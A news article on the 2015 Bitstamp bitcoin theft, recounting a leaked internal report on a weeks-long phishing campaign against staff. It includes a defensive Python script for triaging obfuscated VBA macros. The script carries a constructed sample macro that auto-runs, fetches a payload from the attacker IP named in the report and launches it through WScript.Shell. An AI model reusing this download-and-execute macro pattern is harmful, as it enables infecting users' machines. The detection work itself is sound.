Bitcoin: Secret report on the Bitstamp hack published

Six employees of the Bitcoin exchange Bitstamp were targeted in a phishing campaign that ran for several weeks and ended in January 2015 with the theft of roughly five million dollars' worth of bitcoin. That is the conclusion of an internal company report whose authenticity has not been confirmed.

The confidential document was posted on Reddit by an unknown person using a throwaway account that was apparently created for this purpose alone. It gives a detailed look at the mechanics of the attack and shows how the 19,000 bitcoins were lost earlier this year. The company itself had given only a very brief account of what happened behind the scenes.

Bitstamp employees infected with malware

The report contains detailed information about the cause and the course of events. It also shows the risk that Bitcoin exchanges run today when their staff can be reached through chat and social applications, among other channels.

This is what happened at Bitstamp: the attackers used Skype and e-mail to contact employees and tried to infect them with malware by sending numerous forged documents. The files are said to have been very professionally made and tailored to the employees' personal lives and interests. For the system administrator, this proved costly.

Carelessness of the administrator caused the infection
The Bitstamp system was compromised when system administrator Luka Kodric opened a file that he believed came from a representative of an organization wanting to recruit him as a member. By downloading it unsuspectingly, he installed the attackers' malware.

The report says:

“As part of the ‘offer,’ an attacker sent numerous documents on December 11. One of these documents, UPE_application_form.doc, contained a VBA script with a small piece of malicious spaghetti code. Once opened, the script started downloading a malicious program from IP address 185.31.209.145, compromising our system.”

Spaghetti code is source code written in a messy, unstructured style, with convoluted or partly superfluous control flow. In a document macro, that kind of convolution usually serves to hide from reviewers and antivirus signatures what the code actually does, such as the address it downloads from.
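The report describes the mechanism only in one sentence: a Word document carries a VBA macro, the macro runs on open and fetches a payload from a hard-coded IP. The script below is an added example of how an analyst triages such a macro once its source has been extracted from the document; it is not code from the Bitstamp report, and it does not parse the .doc container itself. The sample macro is constructed for the example (the variable names, the file path and the whole structure are invented; only the IP address is the one quoted in the report). It folds the two obfuscation tricks that make such macros look like spaghetti, Chr() calls and string concatenation across variables, and then looks for an auto-run trigger, download/execute primitives and network indicators.

```python
"""Static triage of a VBA macro: fold Chr()/concatenation obfuscation, then look
for auto-run triggers, download/execute primitives and network indicators.

Added example in the spirit of tools such as oletools' olevba. It is not code
from the Bitstamp report and does not parse .doc files; feed it the macro
source text extracted from a document.
"""
import re

# Constructed sample, NOT the real UPE_application_form.doc macro. The IP is the
# one quoted in the report; path, variable names and structure are invented.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim a, b, c
    a = "ht" & Chr(116) & Chr(112) & "://"
    b = "185.31" & Chr(46) & "209.145"
    c = "/p" & Chr(97) & "yload.bin"
    Call Fetch(a & b & c)
End Sub

Sub Fetch(u)
    Dim o, s
    Set o = CreateObject("MSXML2.XMLHTTP")
    o.Open "GET", u, False
    o.send
    Set s = CreateObject("WScript.Shell")
    s.Run Environ("TEMP") & "\stage2.exe"
End Sub
'''

# Procedure names Office runs automatically, and primitives used to fetch/run code.
AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "Auto_Open", "Workbook_Open")
SUSPICIOUS = ("CreateObject", "XMLHTTP", "URLDownloadToFile", "WScript.Shell",
              "ADODB.Stream", "Shell", "Environ", "powershell")

_CHR = re.compile(r'\bChr\$?\((\d+)\)', re.I)
_CONCAT = re.compile(r'"\s*[&+]\s*"')                       # "ab" & "cd"
_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*("(?:[^"]|"")*")\s*$')  # x = "literal"


def fold_chr(src):
    """Chr(116) -> "t". A quote character becomes the VBA escape "" inside quotes."""
    def lit(m):
        ch = chr(int(m.group(1)))
        return '"' + ('""' if ch == '"' else ch) + '"'
    return _CHR.sub(lit, src)


def merge_concat(src):
    """"ab" & "cd" -> "abcd", repeated until no adjacent literal pair is left."""
    while True:
        src, n = _CONCAT.subn('', src)
        if n == 0:
            return src


def resolve_vars(src):
    """Inline variables that hold a plain string literal into the & expressions using them.
    Only the right-hand side of an assignment is rewritten, so a variable's own definition
    line is never clobbered."""
    lines = src.splitlines()
    consts = {m.group(1): m.group(2) for m in map(_ASSIGN.match, lines) if m}
    out = []
    for line in lines:
        if '&' in line and not line.lstrip().lower().startswith('dim'):
            head, eq, tail = line.partition('=')
            target = tail if eq else head
            for name, lit in consts.items():
                target = re.sub(rf'\b{re.escape(name)}\b', lambda _m, l=lit: l, target)
            line = head + eq + target if eq else target
        out.append(line)
    return '\n'.join(out)


def deobfuscate(src, max_passes=5):
    """Fold Chr(), merge literals, then inline constants to a fixed point."""
    src = merge_concat(fold_chr(src))
    for _ in range(max_passes):
        nxt = merge_concat(resolve_vars(src))
        if nxt == src:
            break
        src = nxt
    return src


def triage(vba_source):
    """Return indicators and a verdict for one macro's source text."""
    clean = deobfuscate(vba_source)

    def found(names):
        return [n for n in names if re.search(rf'\b{re.escape(n)}\b', clean, re.I)]

    report = {
        "autoexec": found(AUTOEXEC),
        "suspicious": found(SUSPICIOUS),
        "urls": sorted(set(re.findall(r'https?://[^\s"\']+', clean, re.I))),
        "ips": sorted(set(re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}\b', clean))),
        "chr_calls": len(_CHR.findall(vba_source)),  # crude obfuscation measure
        "deobfuscated": clean,
    }
    network = bool(report["urls"] or report["ips"])
    if report["autoexec"] and report["suspicious"] and network:
        report["verdict"] = "likely malicious"
    elif report["autoexec"] or report["suspicious"]:
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "no indicators"
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_VBA)
    for k in ("verdict", "autoexec", "suspicious", "urls", "ips", "chr_calls"):
        print(f"{k:>10}: {r[k]}")
```

On the constructed sample the script recovers the full download URL even though no single line of the macro contains it, which is the point of the exercise: a signature for the literal IP string would have missed the obfuscated form, while an auto-run procedure combined with a network fetch and a shell launch is a pattern that survives renaming and re-encoding.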

In the end, the attackers got at the wallet.dat files of Bitstamp's two hot wallets and, using keys they had also captured, emptied them.

If the information is genuine, the report draws on findings of the digital forensics firm Stroz Friedberg, investigators from the US Secret Service and the FBI, and British cybercrime authorities.

Phishing on a large scale
According to the report, the attacks began on November 4, 2014, when one of the attackers contacted Bitstamp CTO (Chief Technology Officer) Damian Merlak and offered him free tickets to a punk rock festival.

In mid-November, COO Miha Grcar was contacted on Skype by a person posing as a reporter, who tried to infect Bitstamp with malware; Grcar refused to accept the document.

Only two days earlier, Bitstamp support chief Anzej Simicak had also come close to being infected, when the attacker claimed to be gathering information for a new project.

In December the attackers got down to business in earnest, stepping up their impersonation attempts: several Bitstamp employees reported similar attempts to infect staff and servers.